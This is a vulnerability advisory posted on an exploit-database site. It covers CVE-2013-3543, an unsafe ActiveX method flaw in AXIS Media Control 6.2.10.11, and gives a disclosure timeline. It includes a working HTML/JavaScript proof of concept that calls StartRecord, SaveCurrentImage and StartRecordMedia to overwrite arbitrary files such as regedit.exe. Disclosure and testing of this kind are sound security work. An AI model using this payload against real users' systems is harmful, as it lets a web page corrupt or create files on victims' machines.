0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method

Author

Javier Repiso Sá.

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

1.Advisory Information
Title: AXIS Media Control ActiveX vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013
 
2.Vulnerability Description
A vulnerability has been found in this devices:
-CVE-2013-3543. Exposed Unsafe ActiveX Method(CWE-618)
 
3.Affected Products
CVE-2013-3543, all camera devices using AXIS Media Control (AMC) are affected
The vulnerability affects to the latest version of the software (6.2.10.11 which was released on October 19, 2012)
 
4.PoC
4.1.Exposed Unsafe ActiveX Method - File Corruption.
In the vendor web, you could see that “AXIS Media Control is the recommended method for viewing video images in Microsoft Internet Explorer.”
Vulnerability which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system.
The vulnerability exists due to the ActiveX control including insecure "StartRecord()",  "SaveCurrentImage()" and "StartRecordMedia()" methods in "AxisMediaControlEmb.dll" DLL. 
This can be exploited to corrupt or create arbitrary files in the context of the current user.
In the following example we will corrupt regedit.exe using one of ActiveX vulnerable methods:
  
When we click on one of the buttons, we could see that regedit.exe is overwritten with garbage:
  
The following code could be used to test the vulnerability:
_____________________________________________________________________________
<html>
    <head>
        <title></title>
        <script language="javaScript" type="text/javascript">
            function startRecord(){
         var theFile = "FilePath//File_name_to_corrupt_or_create";
              MyActiveX.StartRecord(theFile);
            }
            function saveCurrentImage(){
         var theFile = "FilePath//File_name_to_corrupt_or_create";
              var theFormat = 1;
              MyActiveX.SaveCurrentImage(theFormat, theFile);
            }
            function startRecordMedia(){
         var theFile = "FilePath//File_name_to_corrupt_or_create";
              var theFlags = 1;
              var theMediaTypes  = "default"
              MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes);
            }
        </script>
    </head>
    <body>
    <object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}" style="width:640;height:480">
    <param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg">
    <param name="MediaType" value="mjpeg">
    <param name="Volume" value="1">
    <param name="ShowStatusBar" value="1">
    <param name="ShowToolbar" value="1">
    <param name="AutoStart" value="1">
    <param name="UIMode" value="ptz-relative">
    <param name="MediaType" value="mjpeg-unicast">
    <param name="StretchToFit" value="0">
    < param name ='PTZControlURL' value=http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi> 
    </object>
    <br>
    <INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()">
    <INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()">
    <INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()">
    </body>
</html>
_____________________________________________________________________________
 
5.Credits
-CVE-2013-3543 was discovered by Javier Repiso Sánchez.
 
6.Report Timeline
-2013-05-24: Students team notifies the Axis Customer Support of the vulnerability
-2013-05-24: Axis team asks for a report with technical information. 
-2013-05-26: Technical details sent to Axis. 
-2013-05-27: Axis team reports to the technical support to analyze the vulnerability.

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method

Report Error

Report Error